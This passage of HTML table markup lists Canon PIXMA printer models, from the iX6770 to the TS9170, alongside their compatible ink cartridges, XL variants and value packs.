(Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Gray)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"11\" align=\"center\">PIXMA iX6770</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-755XXL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"11\" align=\"center\">PIXMA iX6870</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-755XXL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MG2570S</td>\n<td>CL-746 (Colour)</td>\n</tr>\n<tr>\n<td>CL-746S (Colour)</td>\n</tr>\n<tr>\n<td>CL-746XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-745 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745S (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MG2577S</td>\n<td>CL-746 (Colour)</td>\n</tr>\n<tr>\n<td>CL-746S (Colour)</td>\n</tr>\n<tr>\n<td>CL-746XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-745 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745S (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745XL (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table border=\"1\" width=\"378\" cellpadding=\"10\"><tbody><tr align=\"center\"><td width=\"170\"><strong>Model</strong></td><td width=\"208\"><strong>Cartridge / Bottle</strong></td></tr><tr><td rowspan=\"5\" align=\"center\">PIXMA MG3570</td><td>CL-741 (Colour)</td></tr><tr><td>CL-741XL (Colour)</td></tr><tr><td>PG-740 (Pigment Black)</td></tr><tr><td>PG-740/CL-741 Value Pack</td></tr><tr><td>PG-740XL (Pigment Black)</td></tr><tr><td rowspan=\"5\" align=\"center\">PIXMA MG3670</td><td>CL-741 (Colour)</td></tr><tr><td>CL-741XL (Colour)</td></tr><tr><td>PG-740 (Pigment Black)</td></tr><tr><td>PG-740/CL-741 Value Pack</td></tr><tr><td>PG-740XL (Pigment Black)</td></tr><tr><td rowspan=\"10\" align=\"center\">PIXMA MG7570</td><td>CLI-751 (Black)</td></tr><tr><td>CLI-751 (Cyan)</td></tr><tr><td>CLI-751 (Gray)</td></tr><tr><td>CLI-751 (Magenta)</td></tr><tr><td>CLI-751 (Yellow)</td></tr><tr><td>CLI-751XL (Black)</td></tr><tr><td>CLI-751XL (Cyan)</td></tr><tr><td>CLI-751XL (Gray)</td></tr><tr><td>CLI-751XL (Magenta)</td></tr><tr><td>CLI-751XL (Yellow)</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA MP160</td><td>CL-41 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA MP170</td><td>CL-41 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA MP180</td><td>CL-41 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td rowspan=\"5\" align=\"center\">PIXMA MP228</td><td>CL-41 (Colour)</td></tr><tr><td>CL-831 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td>PG-830 (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MP237</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MP245</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MP258</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MP276</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr></tbody></table><table border=\"1\" width=\"378\" cellpadding=\"10\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MP287</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA MP460</td>\n<td>CL-41 (Colour)</td>\n</tr>\n<tr>\n<td>PG-40 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-40/CL-41 Value Pack</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP476</td>\n<td>CL-41 (Colour)</td>\n</tr>\n<tr>\n<td>CL-831 (Colour)</td>\n</tr>\n<tr>\n<td>PG-40 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-40/CL-41 Value Pack</td>\n</tr>\n<tr>\n<td>PG-830 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MP486</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MP496</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MP497</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP500</td>\n<td>CLI-8 (Black)</td>\n</tr>\n<tr>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA MP520</td>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP530</td>\n<td>CLI-8 (Black)</td>\n</tr>\n<tr>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP568</td>\n<td>CLI-821 (Black)</td>\n</tr>\n<tr>\n<td>CLI-821 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-821 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-821 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-820 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP600</td>\n<td>CLI-8 (Black)</td>\n</tr>\n<tr>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table width=\"378\" border=\"1\" cellpadding=\"10\">\n  <tbody>\n    <tr align=\"center\">\n      <td width=\"170\"><strong>Model</strong></td>\n      <td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP610</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP628</td>\n      <td>CLI-821 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-820 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP638</td>\n      <td>CLI-821 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-820 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP648</td>\n      <td>CLI-821 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-820 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP800</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP800R</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP810</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP830</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"7\" align=\"center\">PIXMA MP970</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Photo Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Photo Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP988</td>\n      <td>CLI-821 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Gray)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-820 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP996</td>\n      <td>CLI-821 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Gray)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-820 (Pigment Black)</td>\n    </tr>\n  </tbody>\n</table>\n<table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA 